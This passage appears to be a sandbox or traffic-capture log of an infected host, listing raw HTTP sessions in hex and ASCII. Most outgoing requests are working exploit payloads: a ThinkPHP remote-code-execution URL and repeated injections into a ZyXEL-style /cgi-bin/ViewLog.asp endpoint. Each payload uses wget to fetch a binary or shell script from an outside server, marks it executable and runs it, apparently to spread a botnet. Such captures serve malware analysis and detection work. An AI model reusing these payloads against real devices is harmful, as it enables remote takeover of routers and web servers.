Feb 14, 2024 09:29:09.499362946 CET	515	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
126	192.168.2.15	42384	95.100.251.107	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:09.708497047 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:09.916337013 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:29:09 GMT Date: Wed, 14 Feb 2024 08:29:09 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 31 37 65 31 39 62 38 26 23 34 36 3b 31 37 30 37 38 39 39 33 34 39 26 23 34 36 3b 31 61 66 36 36 63 64 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.517e19b8.1707899349.1af66cd0</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.15	58964	95.79.101.54	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:09.728993893 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:09.964608908 CET	317	IN	HTTP/1.1 400 Bad Request Server: Web server Date: Wed, 14 Feb 2024 08:28:53 GMT Content-Type: text/html Content-Length: 155 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>Web server</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.15	42320	94.177.135.39	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:10.028311968 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:11.066663980 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:11.260529995 CET	1286	IN	HTTP/1.0 400 Bad Request Server: squid/3.1.9 Mime-Version: 1.0 Date: Tue, 06 Apr 2021 05:24:28 GMT Content-Type: text/html Content-Length: 3161 X-Squid-Error: ERR_INVALID_URL 0 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 3b Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area /#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/ initial title /#titles h1 {color: #000000;}#titles h2 {color: #000000;}/ special event: FTP success page titles /#titles ftpsuccess {background-color:#00ff00;width:100%;}/ Page displayed body content area */#content {padding: 10px;background: #ffffff;

Session ID	Source IP	Source Port	Destination IP	Destination Port
129	192.168.2.15	41364	31.136.116.252	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:10.032653093 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:10.650758028 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:11.898724079 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:14.522563934 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:19.642450094 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:29.626437902 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:50.105648041 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:31.064544916 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
130	192.168.2.15	45704	31.136.16.211	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:10.032785892 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:10.650738001 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:11.898744106 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:14.522547007 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:19.642435074 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:29.626327038 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:50.105628967 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:31.064558983 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
131	192.168.2.15	38894	31.136.105.163	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:10.034320116 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:10.650736094 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:11.898765087 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:14.522550106 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:19.642450094 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
